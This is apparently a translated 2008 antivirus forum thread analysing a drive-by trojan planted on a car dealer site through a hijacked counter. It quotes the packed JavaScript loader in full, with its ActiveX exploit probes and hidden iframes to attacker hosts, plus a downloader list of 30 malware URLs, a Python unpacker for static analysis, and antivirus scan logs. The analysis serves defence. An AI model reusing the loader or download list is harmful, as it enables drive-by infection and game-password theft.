[Virus sample] http://dealer.gobee.cn/test/5.html a trojan has arrived, not sure which command generated it

qqq000@qq.com
Posted 2008-2-28 12:39:26
http://dealer.gobee.cn/test/5.html a trojan has arrived, not sure which command generated it

===========
go 16:56:56
Sigh......... don't know why the virus can't be detected... panicking...
凝逸 16:57:25
The system is patched
凝逸 16:57:39
Check it on a machine without the patch
凝逸 16:57:47
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1
go 17:04:33
So if it's patched there's no problem?
凝逸 17:05:22
But the machines visiting your site won't all be patched
凝逸 17:05:31
You won't get infected, they will
go 17:05:42
All of ours at the company are patched...
凝逸 17:05:56
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1 have you seen this?
go 17:07:11
Already removed that ad~ we're clean now~
go 17:09:07
Please change the address in that post~ if you want to test
you can use http://dealer.gobee.cn/test/5.html
this address
go 17:09:47
Also, I want to ask: is it that once patched, the antivirus no longer detects it?
凝逸 17:10:37
y
go 17:12:12
And the post there needs changing~ otherwise it'll hurt our site~ people will think we planted the trojan, but we're victims too~
凝逸 17:14:05
They won't; the trojan was planted by the counter site, or the counter site got hijacked to serve it

[ Last edited by qqq000@qq.com on 2008-2-28 04:16 ]
qqq000@qq.com
OP | Posted 2008-2-28 12:40:34
I only found left.gif and count_20[1].htm

[ Last edited by qqq000@qq.com on 2008-2-28 04:15 ]
qqq000@qq.com
OP | Posted 2008-2-28 12:46:48
<script>function init(){document.write();}window.onload = init;</script>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(2.z.R(\'v\')==-1){9{0 e;0 j=(2.F("4"));j.H("I","J:N-T-M-L-O"+"P");0 S=j.Q("K.C","")}8(e){};b{0 5=c B();5.A(5.D()+E*w*w*G);2.z=\'v=X;18=/;5=\'+5.1a();6(e!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/14.n></3>")}17{9{0 f;0 19=c k("t.t.1")}8(f){};b{6(f!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/13.n></3>")}}9{0 g;0 y=c k("12.U.1")}8(g){};b{6(g!="[4 7]"){2.a("<u W=V i=d:\\/\\/x\\/Y\\/y.Z><\\/u>")}}9{0 h;0 11=c k("10.16.1")}8(h){};b{6(h!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/15.n></3>")}}}}}',62,73,'var||document|iframe|object|expires|if|Error|catch|try|write|finally|new|http|||||src|ado|ActiveXObject|pic|style|gif|com|51yse|display|none|count|IERPCtl|script|OK|60||pps|cookie|setTime|Date|Stream|getTime|24|createElement|1000|setAttribute|classid|clsid|Adodb|983A|11D0|BD96C556|00C04FC|29E36|createobject|indexOf|as|65A3|PowerPlayerCtrl|javascript|language|Yes|mm|js|GLCHAT|ourgame|POWERPLAYER|logo|left|head|GLChatCtrl|else|path|storm|toGMTString'.split('|'),0,{}))
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1589345.js"></script>
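The eval(...) block in the post above is the Dean Edwards "p,a,c,k,e,d" packer: every word of the real script is swapped for a short base-62 token, the word list travels alongside as a '|'-separated string, and the stub rebuilds the source in the browser and eval()s it. For analysis the substitution can be reversed statically, with no JavaScript engine and without the script ever running. The Python below is an added example written for this page, not code from the thread: the PACKED_SCRIPT constant is the blob quoted above, copied verbatim, while the unpacker functions and the CALL_RE pattern are my own. The decoded output is the loader that dikex's FreShow log traces: a cookie test so a visitor is only served once, a few ActiveX probes, and hidden iframes pointing at count.51yse.com plus the script at http://x/mm/pps.js.

```python
"""Static unpacker for JavaScript obfuscated with the "p,a,c,k,e,d" packer.

The packer replaces every identifier and literal word in the script with a
short base-62 token and ships the word list next to it; a tiny stub rebuilds
the source at run time and hands it to eval().  Reversing the substitution
needs no JavaScript engine, so the loader can be read without rendering it.
"""
import re

# Digits 0-35 of the packer's alphabet; values 36-61 map to 'A'-'Z' (chr(n + 29)).
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(index, radix):
    """Reproduce the packer's e(c): write index in the given radix."""
    head = "" if index < radix else encode_index(index // radix, radix)
    index %= radix
    return head + (chr(index + 29) if index > 35 else DIGITS[index])


def unpack(payload, radix, count, words):
    """Undo the word substitution.

    Token i (0 <= i < count) stands for words[i]; an empty entry means the
    token is its own word and stays as written.  Tokens outside the table are
    also left alone rather than becoming 'undefined' as the JS stub would do.
    """
    table = {}
    for i in range(count):
        token = encode_index(i, radix)
        table[token] = words[i] if i < len(words) and words[i] else token
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)


# Tail of the stub:  }('payload',radix,count,'w|o|r|d|s'.split('|'),0,{})
CALL_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\),0,\{\}\)"
)


def js_unescape(text):
    """Resolve the simple backslash escapes used inside the packed string literal."""
    return re.sub(r"\\(.)", r"\1", text)


def unpack_packed_script(source):
    """Pull the four packer arguments out of the eval(...) stub and unpack them."""
    match = CALL_RE.search(source)
    if match is None:
        raise ValueError("no p,a,c,k,e,d call found")
    payload = js_unescape(match.group(1))
    radix, count = int(match.group(2)), int(match.group(3))
    words = js_unescape(match.group(4)).split("|")
    return unpack(payload, radix, count, words)


# The packed <script> body quoted in the post above, copied verbatim (split into
# pieces only so the lines stay readable; Python concatenates them unchanged).
PACKED_SCRIPT = (
    r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"""
    r"""if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"""
    r"""while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}("""
    r"""'6(2.z.R(\'v\')==-1){9{0 e;0 j=(2.F("4"));j.H("I","J:N-T-M-L-O"+"P");0 S=j.Q("K.C","")}8(e){};"""
    r"""b{0 5=c B();5.A(5.D()+E*w*w*G);2.z=\'v=X;18=/;5=\'+5.1a();6(e!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/14.n></3>")}"""
    r"""17{9{0 f;0 19=c k("t.t.1")}8(f){};b{6(f!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/13.n></3>")}}"""
    r"""9{0 g;0 y=c k("12.U.1")}8(g){};b{6(g!="[4 7]"){2.a("<u W=V i=d:\\/\\/x\\/Y\\/y.Z><\\/u>")}}"""
    r"""9{0 h;0 11=c k("10.16.1")}8(h){};b{6(h!="[4 7]"){2.a("<3 m=q:r i=d://s.p.o/l/15.n></3>")}}}}}',62,73,"""
    r"""'var||document|iframe|object|expires|if|Error|catch|try|write|finally|new|http|||||src|ado|ActiveXObject|pic|style|gif|com|51yse|display|none|count|IERPCtl|script|OK|60||pps|cookie|setTime|Date|Stream|getTime|24|createElement|1000|setAttribute|classid|clsid|Adodb|983A|11D0|BD96C556|00C04FC|29E36|createobject|indexOf|as|65A3|PowerPlayerCtrl|javascript|language|Yes|mm|js|GLCHAT|ourgame|POWERPLAYER|logo|left|head|GLChatCtrl|else|path|storm|toGMTString'.split('|'),0,{}))"""
)


if __name__ == "__main__":
    # Prints the plaintext loader; compare its iframe URLs with dikex's FreShow log.
    print(unpack_packed_script(PACKED_SCRIPT))
```

Run as a script it prints the decoded loader. The output begins with the document.cookie test and contains the same count.51yse.com frame URLs that FreShow recorded, which is the cross-check an analyst wants before trusting a static decode: the unpacked text and the dynamic trace should agree on what gets loaded.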
dikex
Posted 2008-2-28 13:00:40
Log is generated by FreShow.
    [script]http://ads.adlianmeng.com.cn/gobee.asp?tid68652&gco=&ses=&crn=&adss=&ptc=&loo=   (referer check, using http://www.gobee.cn/)
        [frame]http://count.51yse.com/pic/count_20.htm
            [frame]http://count.51yse.com/pic/left.gif
            [frame]http://count.51yse.com/pic/logo.gif
            [script]http://x/mm/pps.js   (odd thing)
            [frame]http://count.51yse.com/pic/head.gif
                [object]http://www.52gol.com/xx.exe

[ Last edited by dikex on 2008-2-28 13:01 ]
Palkia
Posted 2008-2-28 13:05:04
C:\Documents and Settings\Administrator\桌面\xx.exe        Heuri.Suspicious.ERNM        启发式扫描        还未处理
zzh161
Posted 2008-2-28 13:07:51
The counter got hijacked again?

xx.txt
[MAIN]
VERSION=2008-2-3

[URL]
1=hxxp://www.52gol.com/xx/1.exe
2=hxxp://www.52gol.com/xx/2.exe
3=hxxp://www.52gol.com/xx/3.exe
4=hxxp://www.52gol.com/xx/4.exe
5=hxxp://www.52gol.com/xx/5.exe
6=hxxp://www.52gol.com/xx/6.exe
7=hxxp://www.52gol.com/xx/7.exe
8=hxxp://www.52gol.com/xx/8.exe
9=hxxp://www.52gol.com/xx/9.exe
10=hxxp://www.52gol.com/xx/10.exe
11=hxxp://www.52gol.com/xx/11.exe
12=hxxp://www.52gol.com/xx/12.exe
13=hxxp://www.52gol.com/xx/13.exe
14=hxxp://www.52gol.com/xx/14.exe
15=hxxp://www.52gol.com/xx/15.exe
16=hxxp://www.52gol.com/xx/16.exe
17=hxxp://www.52gol.com/xx/17.exe
18=hxxp://www.52gol.com/xx/18.exe
19=hxxp://www.52gol.com/xx/19.exe
20=hxxp://www.52gol.com/xx/20.exe
21=hxxp://www.52gol.com/xx/21.exe
22=hxxp://www.52gol.com/xx/22.exe
23=hxxp://www.52gol.com/xx/23.exe
24=hxxp://www.52gol.com/xx/24.exe
25=hxxp://www.52gol.com/xx/25.exe
26=hxxp://www.52gol.com/xx/26.exe
27=hxxp://www.52gol.com/xx/27.exe
28=hxxp://www.52gol.com/xx/28.exe
29=hxxp://www.52gol.com/xx/29.exe
30=hxxp://www.52gol.com/xx/30.exe


Sample:

[ Last edited by zzh161 on 2008-2-28 13:20 ]
xqiafl
Posted 2008-2-28 13:47:19
Very good, very powerful!
欠妳緈諨
Posted 2008-2-28 13:54:52
D:\病毒测试\未解压样本\xx.rar » RAR » 11\1.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\25.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
曲中求
Posted 2008-2-28 14:28:46
Scan Log
Version of virus signature database: 2907 (20080228)
Date: 2008-2-28  Time: 14:27:08
Scanned disks, folders and files: C:\Documents and Settings\Administrator\桌面\xx.rar
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\1.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\25.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
Number of scanned objects: 26
Number of threats found: 24
Time of completion: 14:27:19  Total scanning time: 11 sec (00:00:11)
hahacomcn
Posted 2008-2-28 14:41:43
Seeing beta5's counts really hurts

Begin scan in 'C:\Documents and Settings\haha\桌面\xx.rar'
C:\Documents and Settings\haha\桌面\xx.rar
  [0] Archive type: RAR
    --> 11\1.exe
          [DETECTION] Is the Trojan horse TR/Drop.Agent.djg.2
  --> 11\10.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
    --> 11\11.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.pmi.12
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\12.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\13.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.1
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
  --> 11\14.exe
      [DETECTION] Is the Trojan horse TR/BHO.aya.1
    --> 11\15.exe
          [DETECTION] Contains suspicious code HEUR/Malware
    --> 11\16.exe
          [DETECTION] Contains suspicious code HEUR/Malware
    --> 11\17.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.3
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\18.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\19.exe
          [DETECTION] Is the Trojan horse TR/Spy.Gen
    --> 11\2.exe
          [DETECTION] Is the Trojan horse TR/Dropper.Gen
    --> 11\20.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.9
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\21.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.2
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\23.exe
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\24.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
          --> Object
            [4] Archive type: RSRC
            --> Object
                [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.4
          [DETECTION] Is the Trojan horse TR/Rootkit.Gen
    --> 11\25.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.Steal.44656
    --> 11\3.exe
          [DETECTION] Is the Trojan horse TR/Onlinegames.rxt
    --> 11\4.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.RSM.2
    --> 11\5.exe
          [DETECTION] Is the Trojan horse TR/Dropper.Gen
    --> 11\6.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NSR.394
    --> 11\7.exe
      --> Object
        [2] Archive type: RSRC
        --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rsl.6
    --> 11\8.exe
          [DETECTION] Is the Trojan horse TR/Spy.Gen
  --> 11\9.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
      [INFO]      A backup was created as '47f4581d.qua'  ( QUARANTINE )


End of the scan: 2008年2月28日  14:41
Used time: 00:04 min

The scan has been done completely.

      0 Scanning directories
     26 Files were scanned
     28 viruses and/or unwanted programs were found
      5 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      1 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     -2 Files not concerned
      1 Archives were scanned
      0 Warnings
      0 Notes